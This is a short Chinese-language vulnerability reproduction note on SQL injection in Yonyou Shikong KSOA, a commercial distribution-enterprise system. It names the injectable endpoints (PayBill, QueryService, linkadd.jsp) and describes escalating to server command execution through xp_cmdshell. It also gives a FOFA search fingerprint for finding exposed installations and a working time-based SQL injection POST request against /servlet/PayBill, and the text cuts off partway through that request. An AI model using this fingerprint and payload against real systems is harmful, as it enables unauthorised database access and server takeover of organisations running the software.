0x01 产品简介
用友时空 KSOA 是建立在 SOA 理念指导下研发的新一代产品,是根据流通企业前沿的 IT 需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。
0x02 漏洞概述
用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞获取数据库权限 ,启用xp_cmdshell 可执行任意命令获取服务器权限。
0x03 复现环境
FOFA:body="οnmοuseοut=\"this.classname='btn btnOff'\""
0x04 漏洞复现
PoC-1
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1';WAITFOR DELAY '0:0:5'--</name><name>